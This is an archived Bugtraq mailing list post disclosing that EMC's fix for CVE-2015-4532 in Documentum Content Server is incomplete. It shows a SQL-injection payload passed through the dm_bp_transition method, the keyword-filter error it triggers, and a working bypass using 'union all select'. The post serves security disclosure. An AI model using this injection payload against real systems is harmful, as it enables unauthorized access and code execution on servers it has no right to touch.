lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 19 Aug 2015 21:39:12 +1000
From: <andrew@...filov.tel>
To: "Bugtraq" <bugtraq@...urityfocus.com>
Subject: Re: EMC Documentum Content Server: arbitrary code execution (incomplete fix in CVE-2015-4532)

Sorry,

previous disclosure contests CVE-2015-4533, though CVE-2015-4532 will be 
also contested soon.

__
Regards,
Andrey B. Panfilov

-----Original Message----- 
From: andrew@...filov.tel
Sent: Tuesday, August 18, 2015 4:25 AM
To: Bugtraq
Subject: EMC Documentum Content Server: arbitrary code execution (incomplete 
fix in CVE-2015-4532)

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

For detailed description see http://seclists.org/bugtraq/2015/Jul/51

New behavior introduced in CVE-2015-4532:

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
        repo repo dmadmin "" 0000000000000000 0000000000000000
        0000000000000000 "0801fd08805c9dfe,'' union select r_object_id
        from  dm_sysobject where r_object_id=''0801fd08805c9dfe"
        0000000000000000  0000000000000000 0000000000000000 ""
        0 0 T F T T dmadmin 0000000000000000'

[DM_METHOD_E_METHOD_ARGS_INVALID]error:
     "The arguments being passed to the method 'dm_bp_transition' are
invalid:
     arguments contain sql keywords which are not allowed."


New attack vector (note ALL keyword):

API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='
        repo repo dmadmin "" 0000000000000000 0000000000000000
        0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id
        from  dm_sysobject where r_object_id=''0801fd08805c9dfe"
        0000000000000000  0000000000000000 0000000000000000 ""
        0 0 T F T T dmadmin 0000000000000000'

__
Regards,
Andrey B. Panfilov

Powered by blists - more mailing lists